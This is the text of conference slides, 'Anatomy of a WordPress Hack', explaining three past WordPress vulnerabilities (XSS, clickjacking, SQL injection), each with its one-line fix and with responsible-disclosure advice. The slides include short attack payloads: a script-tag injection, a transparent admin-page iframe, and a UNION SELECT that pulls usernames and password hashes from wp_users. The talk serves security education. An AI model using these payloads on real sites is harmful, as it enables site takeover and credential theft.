anatomy of a wordpress hack

@brennenbyrne

ANATOMY OF A WORDPRESS HACK

security is

hard

security is

REALLY

hard

security is

REALLY

REALLYhard

but probably

NOTfor the reasons you’re thinking

details

that’s because security is all about the

3 hacksthat broke wordpress

(and how they were fixed)

clickjacking

xss

sqli

this talk is probably for you

this talk is probably for you

(it’s a really good talk)

you might be wondering

“if these have already been fixed,why are we still talking about them?

almost 20% of the web runs on wordpress

almost 20% of the web runs on wordpress

lots of attacks on wordpress sites

almost 20% of the web runs on wordpress

they’ll happen again

lots of attacks on wordpress sites

almost 20% of the web runs on wordpress

lots of attacks on wordpress sites

they’ll happen again

it’s fun and interesting

hello, my name is brennen

@brennenbyrne

I’m a founder of Clef (getclef.com)

anatomy of a wordpress hack

XSScross site scripting

XSS cross site scripting

when a hacker is able to runarbitrary code in every user’s browser

let’s hack

how

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

begin html open tag

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

unsanitized user input

}

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

end html open tag

}

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

begin html close tag

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

unsanitized user input

}

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

end html close tag

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

unsanitized user input

}}

<{$icontag} class=‘gallery-icon’> ... </{$icontag}>

unsanitized user input

}}

unsanitized user input

unsanitized user input

exploit

script src=‘hack.js’

$icontag =

script src=‘hack.js’}

create a script tag

$icontag =

script src=‘hack.js’}load an evil script

$icontag =

how bad is this?

full site compromise

one line fix!

$icontag = tag_escape($icontag)

$icontag = tag_escape($icontag)}removes potentially

malicious code

Clickjacking

clickjackingwhen a hacker tricks you into clicking something you don’t want to click

let’s hack

how

this is your site

this is your site with an iframe

www.another-site.com

now imagine the green is the article

and the red is “delete post”

now imagine the green is the article

and the red is “delete post”

<iframe src=“admin_url” style=“opacity: 0; z-index: 100></iframe>

<iframe src=“admin_url” style=“opacity: 0; z-index: 100></iframe>}

embedding site in another site

}

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

<iframe src=“admin_url” style=“opacity: 0; z-index: 100></iframe>}

embedding admin page

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

<iframe src=“admin_url” style=“opacity: 0; z-index: 100></iframe>}admin page is fully transparent

<iframe src=“admin_url” style=“opacity: 0; z-index: 100”></iframe>}

admin page is above another page

delete post

allow embedding of valuable pages

how bad is this?

full site compromise

one line fix!

@header( 'X-Frame-Options: SAMEORIGIN' );

}

add header to requestsfor valuable pages

@header( 'X-Frame-Options: SAMEORIGIN' );

}tell browser to only allow

iframe embed when it’s on the same domain

@header( 'X-Frame-Options: SAMEORIGIN' );

SQL injection

SQL injectionwhen bad people access your database in bad ways

let’s hack

how

SELECT ... LIMIT $args[4]

SELECT ... LIMIT $args[4]}

select categories from database

SELECT ... LIMIT $args[4]}limit number of categories selected

SELECT ... LIMIT $args[4]}unsanitized user input

SELECT ... LIMIT $args[4]}unsanitized user input

unsanitized user input

exploitunsanitized user input

1 OFFSET 1 UNION ALL SELECT user_login, user_pass FROM wp_users

$args[4] =

1 OFFSET 1 UNION ALL SELECT user_login, user_pass FROM wp_users}

embed a second SQL query

1 OFFSET 1 UNION ALL SELECT user_login, user_pass FROM wp_users}

limit to 1 category and offset by 1

1 OFFSET 1 UNION ALL SELECT user_login, user_pass FROM wp_users

steal usernames and passwords

}

5 character fix!

(int) $args[4]

(int) $args[4]}sanitize user input by coercing it to an integer

how bad is this?

full site compromise

how does this happen?

security is in the details

security is hard

so what should you do?

you cannot know everything

1

you cannot know everything

1

1

you can always learn more

education

1

you will always make mistakes

2

you will always make mistakes

2

2

you must learn from your mistakes

experience

2

you cannot write secure code

3

you cannot write secure code

3

we can write secure code

3

we can write secure code

3

community

3

closing thoughts

thanks

XSS Jon Cave

XSS Jon Cave

Clickjacking Andrew Horton

XSS Jon Cave

SQLi Alexander Concha

Clickjacking Andrew Horton

XSS Jon Cave

SQLi Alexander Concha

WordPress Security Team

Clickjacking Andrew Horton

XSS Jon Cave

CSRF Alexander Concha

SQLi Alexander Concha

WordPress Security Team

WordPress Community

what if I find a security issue?

DO1. verify that it is a real issue

2. email security@wordpress.org

DON’T1. maliciously exploit other wordpress sites

2. publish details of the vulnerability before it has been fixed

upgrade to

3.7

SELECT * FROM questions